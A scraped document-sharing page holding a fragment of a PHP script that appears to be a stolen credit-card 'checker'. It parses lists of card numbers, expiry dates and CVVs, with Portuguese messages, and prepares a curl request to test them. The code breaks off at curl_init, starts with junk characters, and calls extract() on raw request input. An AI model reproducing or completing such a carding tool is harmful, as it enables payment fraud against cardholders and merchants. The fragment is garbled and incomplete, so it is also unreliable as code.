Djwunxsi

You might also like

Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 2

usjjdjdhdbs$start_time = microtime(true);

global $start_time;
function getStr($separa, $inicia, $fim, $contador){
$nada = explode($inicia, $separa);
$nada = explode($fim, $nada[$contador]);
return $nada[0];
}

function deletarCookies() {
if (file_exists("/cookie.txt")) {
unlink("/cookie.txt");
}
}

function multiexplode($delimiters, $string)


{
$one = str_replace($delimiters, $delimiters[0], $string);
$two = explode($delimiters[0], $one);
return $two;
}

if ($_SERVER['REQUEST_METHOD'] == "POST") {
extract($_POST);
} elseif ($_SERVER['REQUEST_METHOD'] == "GET") {
extract($_GET);
}

$lista = str_replace(array(" "), '/', $_GET['lista']);


$regex = str_replace(array(':',";","|",",","=>","-"," ",'/','|||'), "|", $lista);

if (!preg_match("/[0-9]{15,16}\|[0-9]{2}\|[0-9]{2,4}\|[0-9]{3,4}/", $regex,$lista))
{
die("<div class='text-center text-danger'><b>Por favor informe os cartões
corretamente.</b></div>");
}
$lista = $lista[0];
$cc = explode("|", $lista)[0];
$mes = explode("|", $lista)[1];
$ano = explode("|", $lista)[2];
$cvv = explode("|", $lista)[3];
$rnd = rand(1111,9999);

/*if (strlen($mes) == 1){


$mes = "0$mes";
}

if (strlen($ano) == 2){
$ano = "20$ano";
}*/

if (strlen($mes) == 1){
$mes = "0$mes";
}

if (strlen($ano) == 4){
$ano = substr($ano, 2);
}
$randnumero = rand(1111,9999);
$randcasa = rand(1,99);
$ch = curl_init();

You might also like